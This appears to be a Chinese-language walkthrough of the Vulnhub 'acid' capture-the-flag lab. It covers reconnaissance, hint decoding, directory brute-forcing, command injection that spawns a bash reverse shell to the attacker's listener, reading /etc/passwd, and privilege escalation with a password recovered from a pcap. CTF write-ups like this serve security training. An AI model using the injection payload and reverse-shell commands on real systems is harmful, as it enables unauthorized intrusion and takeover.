Vulnhub靶场第四关

Vulnhub靶场 acid

目标：
获得root权限和flag
运行环境：
靶机配置：该虚拟机完全基于Web，提取rar并使用VMplayer运行vmx，网络连接方式设置为net，靶机自动获取IP。
攻击机配置：同网段下有Windows攻击机，安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工具。
1.使用nmap扫描VMware Network Adapter VMnet8 网段
2.获得ip进入主页

3.并且发现端口：Tcp 33447
4.底层服务：Apache2.4.10
5.操作系统：Ubuntu
6.在查看源代码并且解码后得到

7.http://192.168.238.136:33447/images/wow.jpg 猜测图片文件夹为images

8.将图片保存并且用notepad++打开发现了一串加密代码

9.发现是ascll 码,解密后发现为md5再次解密发现了一串数字 63425

10.通过Dirbuster进行目录爆破最终找到了可以执行命令的目录

11.通过burp进行抓包然后发送到重发模块重发，并且开启nc 监听端口 nc -lvn 4444
在post gat 下payload 需要进行url编码.
127.0.0.1&&echo “bash -i >& /dev/tcp/192.168.238.1/4444 0>&1” | bash
编码后重发得到shell

12.输入 python -c ‘import pty;pty.spawn("/bin/bash")’
得到一个交互式的shell

13.查看有哪些的用户 cat /etc/passwd

14.一般查看 id 大于1000的
15.find / -user acid 2>/dev/null 查找用户文件
16.发现一个流量包/sbin/raw_vs_isi/hint.pcapng
17.于是通关python搭建临时服务器命令：
cd /sbin/raw_vs_isi
python -m SimpleHTTPServer 8888

18.浏览器192.168.238.136:8888 将流量包下载到本地并且用
Wireshark打开查找密码

19.su -saman 切换并输入密码：1337hax0r
20.sudo -i 尝试提权并查找flag.txt